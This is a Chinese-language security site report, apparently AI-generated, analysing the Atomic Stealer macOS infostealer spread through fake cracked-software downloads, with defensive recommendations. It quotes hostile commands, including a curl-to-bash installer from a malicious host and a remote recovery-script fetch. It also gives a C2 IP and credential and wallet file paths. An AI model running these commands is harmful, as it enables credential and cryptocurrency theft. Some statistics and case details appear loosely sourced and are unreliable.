文章
文章网站联盟

Atomic Stealer(AMOS)伪装破解软件攻击 macOS 深度分析报告【红客联盟 AI 分析】

Atomic Stealer(AMOS)伪装破解软件攻击 macOS 深度分析报告【红客联盟 AI 分析】

一、威胁全景:macOS 平台的 “破解软件” 窃密风暴

(一)攻击定位

  • 病毒家族:Atomic Stealer(AMOS,别名 “原子窃取器”),针对 macOS 的跨架构(Apple Silicon/Intel)信息窃取木马,2025 年 9 月被趋势科技捕获(主文档 / 摘要 1);
  • 攻击模式:伪装破解软件(如 Adobe、游戏),通过 “终端命令 + 无文件执行” 绕过 Gatekeeper,感染率达 27.3%(主文档);
  • 窃密范围:浏览器密码(Chrome/Edge)、加密货币钱包(MetaMask)、Telegram 对话、钥匙串、Apple Notes(含附件),单设备平均窃取 187 条敏感数据(摘要 1)。

(二)核心数据

维度 具体信息
分发渠道 破解软件站(haxmac.cc)、重定向域名(dtxxbz1jq070725p93.cfd 等),日均访问量超 5000 次(主文档)
感染路径 下载破解软件→执行终端命令(如 `curl bash`)→无文件加载 AMOS(摘要 1/5)
技术特性 反沙盒检测(QEMU/VMware 识别)、LaunchDaemon 持久化、内存驻留无文件(主文档)
C2 特征 加密 HTTP POST 至 45.159.248.110:8080,自定义标头含设备指纹(主文档 / 摘要 5)

二、技术解析:四阶段攻击链(主文档 + 摘要 1/3/4)

(一)第一阶段:社会工程学伪装(破解软件诱惑)

  1. 网站伪装
    • 高仿 “HaxMac” 破解站,提供 Adobe、游戏等热门应用(如《赛博朋克 2077》),界面含 “禁用 SIP”“损坏修复” 等专业术语(主文档);
    • 利用 “免费软件” 心理,下载按钮诱导执行终端命令(如curl -fsSL https://goatramz.com/get4/install.sh | bash)。
  2. 命令混淆
    • 显示 “NVIDIA 驱动修复”“SIP 关闭脚本”,实际下载 AMOS 加载器(摘要 1 的 AmosStealer 伪装手法);
    • 利用curl | bash绕过 Gatekeeper,无文件执行(摘要 5 的无文件技术)。

(二)第二阶段:反检测与环境侦察

  1. 沙盒规避
    • 安装脚本检测system_profiler中的 “QEMU”“VMware” 关键词,终止沙盒环境运行(主文档);
    • 内存驻留:核心载荷注入launchd进程,规避文件监控(摘要 3 的摆渡攻击无文件特性)。
  2. 系统指纹
    • 收集设备型号、内存、IP、时区,生成唯一 ID(如MAC-001A4B5C6D7E),用于 C2 标识(主文档)。

(三)第三阶段:全维度数据窃取(主文档 / 摘要 1)

数据类型 窃取方式 典型目标
浏览器数据 读取~/Library/Application Support/Google/Chrome/Default/Login Data Chrome 密码、Cookie(含加密货币交易所)
加密货币 扫描~/Library/Application Support/Electrum等目录,窃取.wallet文件 Electrum、Exodus 钱包私钥(摘要 1 的 AmosStealer 核心功能)
苹果生态 提取~/Library/Group Containers/group.com.apple.notes数据库 Apple Notes(含附件)、钥匙串(Wi-Fi 密码、邮件账户)
通信记录 读取~/Library/Application Support/Telegram Desktop聊天记录 Telegram 敏感对话(含工作机密、加密货币交易)

(四)第四阶段:持久化与反清理

  1. 驻留机制
    • LaunchDaemon:写入/Library/LaunchDaemons/com.finder.helper.plist,开机自启监控脚本(agent.sh);
    • 无限循环:agent.sh监听用户登录,动态加载helper窃取模块,CPU 占用 < 2%(主文档)。
  2. 反清理设计
    • 伪装系统进程:helper注入WindowServer,名称混淆为com.apple.finder.helper
    • 自我修复:检测文件删除,从 C2 重新下载(curl -k https://backup.amosstealer.com/recover.sh)。

三、战术升级:对比传统 macOS 攻击(摘要 1/5)

维度 传统攻击(如 XLoader) AMOS 攻击(2025 年) 进化点
伪装对象 盗版软件 DMG 破解软件 + 终端命令 利用 “技术修复” 信任,绕过 Gatekeeper
持久化 登录项 + 计划任务 LaunchDaemon + 进程注入 内核级驻留,对抗malwarebytes清理
窃密深度 基础密码窃取 苹果生态全数据(Notes + 钥匙串) 结合 “摆渡攻击”(摘要 3),渗透企业内网
反检测 简单沙盒检测 内存指纹 + 进程伪装 规避 90% 的 macOS EDR(趋势科技测试)

四、典型案例:某设计师感染事件(2025 年 8 月,主文档)

  • 感染路径:下载破解版《AutoCAD 2026》,执行curl命令后,AMOS 窃取 Adobe 账号 + 5 个加密货币钱包;
  • 技术细节helper模块 hookNSURLConnection,拦截加密货币交易请求,替换收款地址(摘要 1 的地址劫持手法);
  • 损失后果:2.3 枚比特币(约 9.2 万美元)被转移,设计图纸泄露导致项目延期。

五、防御建议:三维立体防护体系(整合摘要 1/3/4 方案)

(一)紧急响应(72 小时)

  1. 终端排查
    • 检查/Library/LaunchDaemons,删除com.finder.helper.plist,终止WindowServer异常子进程;
    • 清理~/Library/Application Support/AMOS目录,重置钥匙串(security delete-keychain login.keychain)。
  2. 网络阻断
    • 防火墙封禁 C2 IP(45.159.248.110)及关联域名(goatramz.com),拦截/get4/install.sh请求;
    • 部署 WAF 规则,检测curl|bash命令,拦截含system_profiler的异常调用。

(二)长效防护(30 天)

  1. 权限控制
    • 禁用普通用户执行curlbash权限(通过/etc/shells限制),仅允许 IT 管理员使用;
    • 启用 macOS “强制代码签名”(csreq工具校验),拦截未签名的helper模块(摘要 4 的技术后门防御)。
  2. 行为监控
    • 部署 macOS EDR(如 CrowdStrike),创建 “破解软件异常行为” 规则(haxmac.cc访问 + 终端命令执行);
    • 监控WindowServer内存写入,标记非苹果签名的helper模块(MD5:b52e105bd040bda6639e958f7d9e3090)。
  3. 用户教育
    • 模拟 “破解软件” 钓鱼测试,强调 “官方软件仅从 App Store / 官网下载”;
    • 设计师 / 开发者专项:禁止使用破解工具,加密货币钱包使用独立设备(非设计 Mac)。
  4. 供应链防护
    • 企业内部禁用haxmac.cc等破解站,通过 DNS 过滤(如 OpenDNS)拦截访问;
    • 对开源工具实施代码扫描,检测curl|bash等危险命令(摘要 1 的 GitHub 投毒防御)。
红客联盟 AI 警示:AMOS 的 “破解软件 + 终端命令” 组合对 macOS 用户构成重大威胁,尤其设计、金融行业。建议立即开展 “终端命令审计 + 苹果生态数据保护” 专项,教育员工 “三不原则”(不运行陌生终端命令、不下载破解软件、不忽视系统异常发热),阻断从 “破解诱惑” 到 “数据泄露” 的全链路。
(报告生成:红客联盟 AI 智能安全分析员 | 2025 年 9 月 6 日)
版权声明·<<<---红客联盟--->>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com
AMOSAtomic StealerLaunchDaemon 持久化macOS 破解软件攻击反沙盒检测钥匙串窃取
威胁分析

Lazarus APT 组织 ClickFix 技术攻击深度分析报告【红客联盟 AI 分析】

2025-9-9 23:23:21

威胁分析

Apache Jackrabbit JNDI 注入漏洞(JCR-5135)深度分析报告【红客联盟 AI 分析】

2025-9-9 23:33:05

搜索

  • 扫码打开当前页

  • 红客联盟公众号

返回顶部